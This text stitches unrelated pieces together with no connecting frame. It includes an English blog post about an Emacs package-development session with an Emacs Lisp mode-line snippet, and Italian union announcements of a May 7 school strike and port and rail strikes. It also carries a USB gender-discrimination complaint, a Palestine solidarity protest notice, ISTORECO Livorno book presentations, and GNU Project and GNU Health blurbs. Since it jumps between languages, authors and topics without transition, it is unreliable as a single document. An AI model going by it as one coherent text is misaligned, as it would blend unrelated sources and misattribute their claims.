Yesterday we had our second session focused on ffs, which I recorded
and share publicly with everyone with Prot's permission, so that
others can also benefit from Prot's insights and experience as we
discuss various aspects of Emacs package development with the concrete
example of ffs.
Here is the video recording of our session:
You can view or download the full-resolution video from the Internet Archive.
I addressed most of Prot's feedback about ffs from our first
session, and I'll be working on the changes we discussed in this
session in the next days.
In the last third of the video we switched topics to discuss a few
Emacs-related tangents including adding a 'padding' effect for the
mode line and its constructs, and distilling and separating the
easily-reusable package-like parts of one's Emacs configuration from
the actual configuration of those parts (e.g. the distinction of
prot-lisp and prot-emacs-modules in Prot's Emacs configuration).
For mode line padding, here is the snippet I'm using with Prot's
doric-themes:
(doric-themes-with-colors
(custom-set-faces
`(mode-line
((t :box (:line-width 6 :color ,bg-shadow-intense))))
`(mode-line-inactive
((t :box (:line-width 6 :color ,bg-shadow-subtle))))
`(mode-line-highlight
((t :box (:color ,bg-shadow-intense))))))
Take care, and so long for now.
MANIFESTAZIONE A LIVORNO ORE 9:30 PIAZZA CAVOUR
Il 7 maggio lavoratrici e lavoratori della scuola incroceranno le braccia insieme a studentesse e studenti, con manifestazioni territoriali in decine di città. L'appuntamento a Roma è alle ore 9:00 al MIM in viale Trastevere.
Lo sciopero, proclamato anche per il 6 maggio per garantire la massima copertura al personale, chiama al boicottaggio delle prove INVALSI e raccoglie l'invito alla mobilitazione dell'assemblea internazionale giovanile We do not enlist.
Scioperiamo contro la militarizzazione della scuola e della società, contro la leva obbligatoria, contro la riforma degli istituti tecnici e professionali che consegna la formazione delle classi popolari direttamente nelle mani delle imprese, contro le nuove linee guida dei licei e contro un rinnovo contrattuale che propone salari vergognosi mentre l'inflazione cresce, trascinata dai costi di guerre che non abbiamo voluto e non vogliamo.
La scuola di Valditara non è la nostra. Le sue politiche reazionarie, classiste, repressive e di militarizzazione sono nemiche di studenti e lavoratori. Riprendiamoci spazi di democrazia e di organizzazione politica e sociale a partire dalle scuole, lottiamo per una scuola statale al servizio di chi la fa e la vive. Cancelliamo quasi quarant'anni di controriforme.
Né "capitale umano" né manodopera ideologizzata!
Scioperiamo perché la scuola non deve essere ridotta a produttrice di "capitale umano" da immettere sul mercato del lavoro secondo le logiche della competitività e del profitto. Rifiutiamo la retorica delle competenze, strumento ideologico con cui si svuotano i saperi critici e si addestrano menti flessibili, adattabili, sfruttabili. Rifiutiamo ancora una volta la formazione scuola-lavoro, sfruttamento di lavoro minorile travestito da esperienza formativa, che è già costata la vita a troppi giovani.
In questo quadro si innesta la riforma degli istituti tecnici e professionali. I nuovi percorsi 4+2 e i nuovi quadri orari piegano i programmi alle esigenze produttive dei territori, erodono la formazione generale e critica, e avviano gli studenti delle classi popolari – quelli che storicamente frequentano i tecnici e i professionali – a diventare manodopera qualificata su misura per il distretto industriale di turno. Non è orientamento, è selezione di classe. Non è innovazione didattica, è privatizzazione strisciante del sapere.
Le nuove Indicazioni per i Licei: l'altra faccia dello stesso progetto classista.
Mentre i tecnici e i professionali vengono consegnati alle imprese, il 22 aprile il ministero ha pubblicato il testo delle nuove Indicazioni Nazionali per i Licei: l'altra metà del disegno. Non un'operazione separata, ma il complemento ideologico della stessa controriforma. Ai figli delle classi popolari avviati nei "licei agrari", "chimici" o "tessili" – la trovata semantica con cui Valditara annuncia di voler smantellare la distinzione formale tra licei e tecnici – si vuole consegnare la formazione professionalizzante; ai licei tradizionali, frequentati in gran parte dalla borghesia e dai ceti medi, si destina invece la costruzione di una "coscienza" identitaria dichiaratamente eurocentrica e nazionalista.
La centralità della storia dell'Italia e dell'Occidente, la soppressione della geostoria, la ridefinizione dell'inclusione come "architrave della cultura occidentale moderna": non sono scelte didattiche neutre, ma una precisa operazione politica. Si riscrive il canone in chiave identitaria, si restringe lo sguardo storico proprio mentre si chiede ai nostri ragazzi di diventare carne da cannone in guerre globali, si svuotano gli strumenti critici per leggere il presente – il colonialismo, le migrazioni, il genocidio in corso – riducendoli a marginalità rispetto a un nucleo "euro-occidentale" presentato come depositario universale di diritti e civiltà. È la stessa narrazione bellicista che giustifica l'aumento delle spese militari e la riduzione del welfare, trasferita dentro i programmi scolastici. L'irruzione dell'intelligenza artificiale "in attuazione della Legge 132/2025 e dell'AI Act", senza alcuna formazione strutturata per il personale e senza investimenti reali, completa il quadro: parole d'ordine modernizzanti su un impianto culturalmente regressivo.
E come già accaduto per le Indicazioni del primo ciclo, la "consultazione" è una farsa: il questionario predisposto dal ministero non prevede neanche l'opzione del parere negativo. La fase di ascolto è una messa in scena, come lo è la riforma stessa.
Tecnici e licei, dunque, non sono due capitoli distinti: sono il dritto e il rovescio dello stesso progetto. Una scuola che separa, che gerarchizza, che addestra i figli del lavoro al lavoro precario e i figli delle élite a una "missione di civiltà" funzionale alla retorica di guerra. Va respinta tutta intera.
Inclusione, salari, contratto
Scioperiamo per la scuola che include e non separa, capace di rispondere ai tagli agli organici di sostegno e ai servizi per gli alunni con disabilità previsti dal decreto legislativo 62/2024 – scelte di cinica contabilità fatte sulla pelle di studenti, famiglie e lavoratori, mentre i soldi pubblici vengono trasferiti all'industria militare. Rivendichiamo la stabilizzazione dei precari, l'internalizzazione degli educatori delle cooperative sociali, salari adeguati all'inflazione, un contratto degno.
Contro la leva, contro la guerra!
Davanti al rischio di escalation della guerra in Iran e alle sue ricadute globali, mentre il genocidio del popolo palestinese continua nel silenzio complice dei governi occidentali e delle complicità con lo Stato di Israele, dobbiamo riconnettere scuola e società reale. La scuola rischia di essere risucchiata nella spirale folle innescata dagli USA di Trump, con il silenzio-assenso degli altri governi occidentali, e di essere ridotta a funzione del processo di militarizzazione.
In molti paesi europei si è già reintrodotta o ci si avvia a reintrodurre la leva militare obbligatoria. Anche contro la leva dobbiamo scioperare: gli studenti non sono carne da cannone, non sono forza lavoro disponibile, non sono risorse umane da ottimizzare per l'economia di guerra. Il progetto di reintroduzione della coscrizione non è separabile dall'escalation bellica, dall'aumento delle spese per gli armamenti a scapito del welfare, dalla narrazione che vuole trasformare le nostre scuole in anticamere delle caserme.
Non a caso il 7 maggio sarà anche il giorno dello sciopero dei lavoratori portuali di USB contro la privatizzazione e la militarizzazione dei porti: una convergenza che riconnette i protagonisti delle mobilitazioni dello scorso autunno e dà forza a un progetto alternativo.
Il 7 maggio si sciopera. Studenti e lavoratori uniti, contro la guerra, contro la leva, contro la scuola classista di Valditara – tecnici e licei. Per una nuova scuola pubblica, statale, democratica e antifascista.


Martedì 12 maggio 2026, ore 17.00
Edificio dell’Orologio, Piazza Luigi Orlando – Livorno- Nuova sede di ISTORECO
Livorno, maggio 1849. Le truppe austro-estensi entrano in città dopo due giorni di assedio, mettendo fine a una resistenza tenace e simbolica. Per i vincitori, comincia allora la parte più difficile: ricostruire un ordine politico che la rivoluzione ha frantumato nel profondo.
È questo il territorio inesplorato al cuore del libro di Giacomo Zanasi, un lavoro documentato e originale che sceglie di andare controcorrente: anziché raccontare la rivoluzione, ne segue il soffocamento. Anziché dare voce ai rivoltosi sulle barricate, assume il punto di vista di chi doveva riportare l’ordine – funzionari, autorità, occupanti – e si trova a fare i conti con una città che non dimentica e non perdona.
Tra processi politici, arresti di massa, esuli in fuga verso la Corsica e una prima amnistia a novembre, «Li tiranni di quella fazione» ricostruisce come Livorno – la città più radicale del Granducato, la più politicizzata, la più refrattaria allo status quo – sia diventata un laboratorio della seconda Restaurazione. E come il lungo Quarantotto abbia lasciato un segno indelebile nella vita di una comunità intera, dividendola lungo linee di frattura che non si sarebbero più del tutto richiuse.
Interverranno:
Catia Sonetti, Direttrice ISTORECO Livorno (introduce e coordina)
Marco Manfredi, Università di Pisa
Giacomo Zanasi, Università di Salerno
La pubblicazione è stata realizzata grazie al contributo della Direzione Generale Educazione, Ricerca e Istituti Culturali del Ministero della Cultura.
Lunedì 11 maggio 2026, ore 17.00 Edificio dell’Orologio – Piazza Luigi Orlando, Livorno- Nuova sede di ISTORECO
Roma fu liberata il 4 giugno. Lo sbarco in Normandia due giorni dopo. L’estate del 1944 sembrava annunciare la fine imminente della guerra. Poi, invece, arrivarono i mesi di stallo.
L’offensiva alleata si arenò ai piedi della Linea Gotica. I partigiani dovettero abbandonare le montagne. Il proclama Alexander ordinò, di fatto, la sospensione della lotta armata. Per chi combatteva, per chi si nascondeva, per chi sperava soltanto di sopravvivere, il 1944 fu un anno che sembrò non finire mai.
Eppure questo anno cruciale è rimasto a lungo in ombra nella nostra memoria collettiva, schiacciato tra il trauma dell’armistizio del 1943 e i fuochi della Liberazione del 1945. Il libro 1944: L’anno prima della fine della guerra lo riporta al centro della scena, con gli occhi e le voci di una nuova generazione di storici.
Sedici saggi che riassumono tre prospettive: gli Alleati, con la loro babele di lingue, culture e pratiche; gli occupanti e i resistenti, con le loro paure e le speranze di un mondo in bilico; la transizione verso il dopoguerra, con le memorie e i tentativi – spesso falliti — di fare i conti con il passato.
Un libro che non si accontenta di raccontare battaglie e date, ma tenta di restituire i timori e le emozioni sul futuro, dell’Italia e di chi quella guerra la stava vivendo sulla propria pelle.
Ne discuteranno con due dei curatori Gianluca Fulvetti (Università di Pisa) e Francesco Fusi (ISRT), Federico Creatini (Università della Calabria) e Nicoletta Arena (Università di Firenze). Coordina Giovanni Brunetti (ISTORECO).
USB, nell’ambito delle attività dello sportello dedicato alla prevenzione e al contrasto delle discriminazioni di genere nei luoghi di lavoro, intende portare all’attenzione pubblica e delle istituzioni competenti una vicenda che presenta rilevanti profili di possibile discriminazione indiretta legata al genere e vittimizzazione secondaria.
La situazione riguarda una lavoratrice impiegata in somministrazione con contratto a tempo determinato, recentemente giunto a scadenza senza rinnovo. Nel corso del rapporto di lavoro, la lavoratrice ha vissuto una condizione di particolare vulnerabilità in quanto vittima di violenza domestica, circostanza che ha inciso profondamente sulla sua condizione personale e lavorativa. Tale contesto era stato rappresentato all’Azienda utilizzatrice, Bertani Trasporti S.p.A., sia attraverso i responsabili di sito sia mediante interlocuzioni con le risorse umane, evidenziando come le assenze maturate fossero strettamente connesse agli effetti fisici e psicologici della violenza subita e alla necessità di adempiere a inderogabili impegni di natura legale.
Prima della scadenza contrattuale, USB e RETE ISIDE, attraverso lo Sportello contro le molestie, discriminazioni e violenza di genere nei luoghi di lavoro hanno formalmente segnalato a Bertani Trasporti la possibile sussistenza di un profilo discriminatorio connesso alla condizione della lavoratrice. Nonostante ciò, il rapporto di lavoro non è stato rinnovato. Nel riscontro fornito, l’Azienda ha ricondotto la decisione all’applicazione di criteri ritenuti oggettivi e uniformi, tra i quali la continuità della prestazione lavorativa.
Riteniamo che questo non sia assolutamente sufficiente ad escludere possibili profili di criticità. L’applicazione di un criterio apparentemente neutro come quello della continuità della prestazione, in assenza di una valutazione sostanziale delle cause delle assenze, rischia infatti di produrre un effetto sproporzionatamente sfavorevole nei confronti di una lavoratrice la cui condizione è direttamente riconducibile a una situazione di violenza di genere già portata all’attenzione aziendale. In questo senso, la vicenda si presta a essere letta alla luce della nozione di discriminazione indiretta, oltre che sotto il profilo della possibile vittimizzazione secondaria, laddove una decisione organizzativa finisca per aggravare le conseguenze di una condizione di vulnerabilità già esistente.
A ciò si aggiunge il fatto che la lavoratrice è inserita in un nucleo monogenitoriale e sostiene in via esclusiva i carichi di cura familiare. Tale circostanza, che avrebbe richiesto una valutazione attenta e sostanziale nell’ambito delle decisioni organizzative e contrattuali, non risulta essere stata adeguatamente considerata. Anche sotto questo profilo, l’applicazione rigida di criteri formali rischia di tradursi in un trattamento penalizzante, in contrasto con i principi di tutela della genitorialità e di conciliazione tra vita lavorativa e familiare sanciti dall’ordinamento.
Riteniamo fondamentale una concreta attenzione alle condizioni reali delle lavoratrici, in particolare di quelle che subiscono violenza, sia nei contesti domestici sia nei luoghi di lavoro, che non può limitarsi a un approccio formale, ma deve necessariamente passare attraverso il riconoscimento della complessità delle situazioni individuali, delle condizioni materiali di vita e delle dinamiche strutturali che incidono sulle possibilità di autodeterminazione.
Il fatto si inserisce, non a caso, in un contesto caratterizzato da precarietà e subalternità. Si tratta di una lavoratrice in somministrazione, dunque appartenente a una delle categorie meno tutelate e maggiormente esposte a forme di ricattabilità e sfruttamento. Il settore in cui è impiegata, quello della logistica, è storicamente costruito su un sistema di appalti e subappalti che tende a frammentare i rapporti di lavoro e a scaricare i costi sulla forza lavoro, alimentando condizioni di instabilità occupazionale, bassi salari e organizzazioni del lavoro spesso incompatibili con i tempi di vita.
Questo modello produttivo, fondato sul contenimento dei costi e sull’esternalizzazione, si traduce sistematicamente nell’abbassamento delle tutele e nella compressione dei diritti, incidendo in maniera particolarmente significativa sulle lavoratrici, soprattutto quando già esposte a condizioni di vulnerabilità. In tale contesto, il rischio di discriminazioni, anche indirette, si amplifica e si intreccia con dinamiche strutturali di disuguaglianza.
Per queste ragioni, USB ha ritenuto doveroso trasmettere formale segnalazione alle istituzioni competenti, in primis la Consigliera di Parità provinciale, la Vicesindaca con delega alle Pari Opportunità, ma anche il Sindaco e il Prefetto, attori che hanno recentemente sottoscritto il Manifesto per il lavoro buono, impegnandosi a promuovere un modello di lavoro inclusivo e attento alla tutela della dignità delle persone.
La vicenda descritta appare infatti difficilmente conciliabile con i principi affermati sia dalla normativa nazionale e sovranazionale in materia di pari opportunità e contrasto alla discriminazione, sia con gli impegni pubblicamente assunti attraverso la sottoscrizione del Manifesto. Proprio per questo è importante che sia posta all’attenzione delle istituzioni pubbliche e dell’opinione pubblica , affinché vengano approfonditi tutti gli elementi rilevanti e, ove ne ricorrano i presupposti, adottate le iniziative più idonee a garantire una piena tutela dei diritti della lavoratrice e a prevenire il ripetersi di situazioni analoghe, sia all’interno di Bertani Trasporti S.p.A. sia, più in generale, nelle aziende operanti nel settore della logistica e negli altri contesti produttivi.
USB - Sportello contro le molestie, le discriminazioni e la violenza d genere nei luoghi di lavoro


Lunedì 4 Maggio le realtà cittadine che compongono la rete di solidarietà per la Palestina, hanno lanciato un presidio davanti al consolato onorario della Grecia in via Fagiuoli 1. Successivamente ci sposteremo davanti all Prefettura.
Chiediamo un intervento deciso del Governo Italiano a tutela degli attivisti e attiviste della Global Sumud Flotilla. Chiediamo l'immediata liberazione di Thiago e Saif, dopo il rapimento illegale da parte di Israele.
Tra i partecipanti alla missione ci sono anche 4 attivisti livornesi.
Ex Caserma Occupata, gruppo autonomo portuali, USB, collettivo studentesco Scuola di Carta, Potere al Popolo, Teatro Refugio, Associazione Livorno Palestina, Coordinamento Antimilitarista saranno in piazza e invitano la città di Livorno a mobilitarsi per l'interruzione dei rapporti con Israele. Sanzioni e embargo immediato. Per la liberazione di tutti i prigionieri.
Martedì 5 maggio è previsto lo sciopero regionale dei lavoratori RFI. Con manifestazione, dalle ore 10, davanti alla Prefettura di Firenze.
Sciopero proclamato per l'intera prestazione.
Per la sicurezza sul lavoro e contro l'utilizzo bellico della rete ferroviaria.
Giovedì 7 Maggio. Sciopero nazionale dei Portuali. Per il riconoscimento del lavoro usurante ai fini pensionistici e contro l'utilizzo delle risorse pubbliche per i piani di riarmo. Contro l'aumento dei prezzi e inflazione alle stelle, servono meccanismi automatici di tutela dei salari e delle pensioni. Basta destinare miliardi di euro in armi invece che nei servizi pubblici.
Una delegazione di portuali Livornesi parteciperà alla Manifestazione davanti al Ministero del Lavoro a Roma.
Il 7 Maggio è previsto anche lo sciopero nazionale della scuola. Studenti e lavoratori scenderanno in piazza contro la reintroduzione della leva militare e per opporsi alla riforma classista degli istituti tecnici
A Livorno il collettivo studentesco Scuola di Carta ha lanciato una manifestazione. Dalle ore 9 in Piazza Cavour. USB sarà presente!
Invitiamo gli iscritti e le iscritte, i lavoratori e le lavoratrici a mobilitarsi, scioperare e scendere in piazza.
Prepariamoci per la manifestazione nazionale a Roma del 23 maggio.

The initial injustice of proprietary software often leads to further injustices: malicious functionalities.
The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.
We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.
GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️
They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.
The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64
About Cyber|Show:
https://cybers ... w.uk/about.php
Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth
Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow







In occasione dell’anniversario della Giorno della memoria dedicato alle vittime del terrorismo presentiamo un libro che ricostruisce, per la prima volta in modo sistematico, la storia delle Commissioni d’inchiesta istituite tra il 1973 e il 1975 dalle regione per far luce sul fenomeno neofascista e sulla violenza politica degli anni della strategia della tensione. Un’iniziativa senza precedenti nella storia della Repubblica in quanto si trattava di un laboratorio democratico in cui istituzioni, sindacati, università e società civile si unirono per censire e contrastare l’eversione nera, proprio nel momento in cui il paese era attraversato dalle stragi – da piazza Fontana a piazza della Loggia – e da una conflittualità diffusa e lacerante.
Attraverso fonti archivistiche inedite, l’autore ricostruisce il ruolo cruciale che le Regioni – istituzioni nate solo nel 1970 – seppero svolgere nel rafforzamento della democrazia repubblicana, trasformando le commemorazioni per il trentennale della Liberazione in un atto politico di antifascismo militante e propositivo.
Introduzione di Catia Sonetti (Direttrice ISTORECO). Dialogheranno con l’autore Federico Creatini (Università della Calabria) e Giovanni Brunetti (ISTORECO).












